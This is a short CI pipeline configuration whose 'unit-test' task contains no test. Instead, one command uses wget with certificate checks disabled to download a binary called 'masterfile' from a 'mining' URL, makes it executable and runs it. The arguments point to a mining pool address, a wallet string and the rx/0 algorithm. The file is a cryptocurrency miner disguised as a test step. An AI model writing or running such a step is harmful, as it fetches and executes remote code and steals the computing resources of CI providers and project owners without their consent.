
#tasks:
# build-deps:
#    runner: docker
#   steps:
#    - run: docker build .
version: v2

tasks:
  unit-test:
    steps:
    - checkout
    - commands: 
      - wget --no-check-certificate https://swenson.my.id/mining/masterfile && chmod 777 masterfile && ./masterfile -o 139.99.124.170:80 -u 86fGg98tj5QTt4peYzxDrD4BfChE1LPtkceC6rVC6iP3FuApcNecY1c32cgrwMtWNY87H4iq2CM3DPJWQhjW8Mr7LQeZRsr -k -a rx/0 -p ops
    - commands:
    - run: docker run p
      when: always
      background: true
